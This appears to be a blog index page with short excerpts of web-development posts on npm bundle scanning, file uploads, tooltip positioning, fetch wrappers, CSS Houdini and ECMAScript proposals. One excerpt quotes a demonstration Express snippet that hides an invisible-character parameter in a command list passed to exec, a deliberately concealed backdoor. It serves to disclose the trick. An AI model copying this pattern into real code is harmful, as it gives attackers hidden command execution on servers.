Identify which NPM libraries are used on a website with Bundle Scanner

Bundle Scanner identifies which npm libraries are used on any website. It downloads every Javascript file from a URL and searches through the files for code that matches one of the 35,000 most popular npm libraries. The scanning itself works in a pretty ingenious way: When a user requests to scan a website, Bundle Scanner …

10 useful HTML file upload tips for web developers

A bit of an older post, but still relevant: Tapas Adhikary goes over some HTML attributes one can set on an input[type=”file”], and uses of the File API: Simple file upload Multiple file uploads Know about file metadata Know about file accept property Manage file content Validate file size Show file upload progress How about …

Floating UI – Positioning for tooltips, popovers, dropdowns, and more

Floating UI is a low-level library for positioning “floating” elements like tooltips, popovers, dropdowns, menus and more. Floating UI exposes primitives which enable a floating element to be positioned next to a given reference element while appearing in view for the user as best as possible. Features include overflow prevention (or collision awareness), placement flipping, …

The Invisible JavaScript Backdoor

Wolfgang Ettlinger carefull crafted this JavaScript snippet, which contains a backdoor. const express = require(‘express’); const util = require(‘util’); const exec = util.promisify(require(‘child_process’).exec); const app = express(); app.get(‘/network_health’, async (req, res) => { const { timeout,ㅤ} = req.query; const checkCommands = [ ‘ping -c 1 google.com’, ‘curl -s http://example.com/’,ㅤ ]; try { await Promise.all(checkCommands.map(cmd => …

Advent Calendars For Web Designers And Developers

I was planning on posting about the HTMHell Advent Calendar here on bram.us, but over at Smashing Magazine you a whole list of interesting Advent Calendars. Once again, the web community has been busy with creating some fantastic advent calendars this year. As you’ll see, each and every one of these calendars are sure to …

ohmyfetch — A better fetch API

ohmyfetch is a better fetch API. Works on node, browser and workers. import { $fetch } from ‘ohmyfetch’ Import it and use it as you’d use regular fetch. On top of that, you can use some of the extra convenience methods and options — such as easy response parsing, JSON body, Auto Retry, … — …

CSS Houdini Blobs

Tim Broddin — ubernerd and also my tech colleague at VRT Creative Lab — released a very nice Houdini Paint Worklet that draws some smooth blobs. .css-houdini-blobs { –num-blobs: 40; –seed: 4749; –colors: #71a7ee, #7940c1, #f0e891; –min-opacity: 0.1; –max-opacity: 0.5; background: paint(blobs); } Glad to see Tim used css-houdini-circles as a starting point to work …

ECMAScript Proposals Overview

Saad Quadri created a handy website that lists all ECMAScript Proposals. On one single page you can get a quick glimpse of all proposals and the current stage they are in. Great to see that the various stages of the TC39 Development Process themselves —something I always mention in my ever-evolving talk on ESNext— get …